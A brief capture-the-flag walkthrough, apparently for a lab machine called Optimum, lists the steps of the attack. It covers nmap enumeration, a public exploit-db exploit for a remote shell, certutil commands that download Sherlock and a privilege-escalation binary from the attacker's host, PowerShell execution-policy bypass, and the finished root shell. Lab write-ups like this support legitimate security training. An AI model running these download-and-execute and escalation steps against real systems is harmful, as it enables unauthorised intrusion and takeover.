- We use
nmap -p- -A -Pn 10.10.10.8to enumerate:
- We found a website:
- We used the exploit https://www.exploit-db.com/exploits/39161 we need nc.exe
- we can find it in /usr/share/windows-resources/binaries/nc.exe and paste it into our Downloads/optimum folder
- We modify the ip in the exploit file
python3 -m http.server 80and host our current directory for the nc.exe file- We keep running the exploit with
python 39161.py 10.10.10.8 80to get the shell:
- Then we upload sherlock(https://github.com/rasta-mouse/Sherlock) using
certutil -urlcache -f http://10.10.14.25/sherlock.ps1 sherlock.ps1 - Then use it to look for vulnerabilites using:
powershell.exe -exec bypass -Command "& {Import-Module .\sherlock.ps1; Find-AllVulns}":
- We can also use wesng(https://github.com/bitsadmin/wesng)
- We use https://github.com/sensepost/ms16-098/blob/master/bfill.exe to get privilege escalation by uploading the file first
certutil -urlcache -f http://10.10.14.25/bfill.exe bfill.exeand then executing itbfill.exe:
We get a root shell.
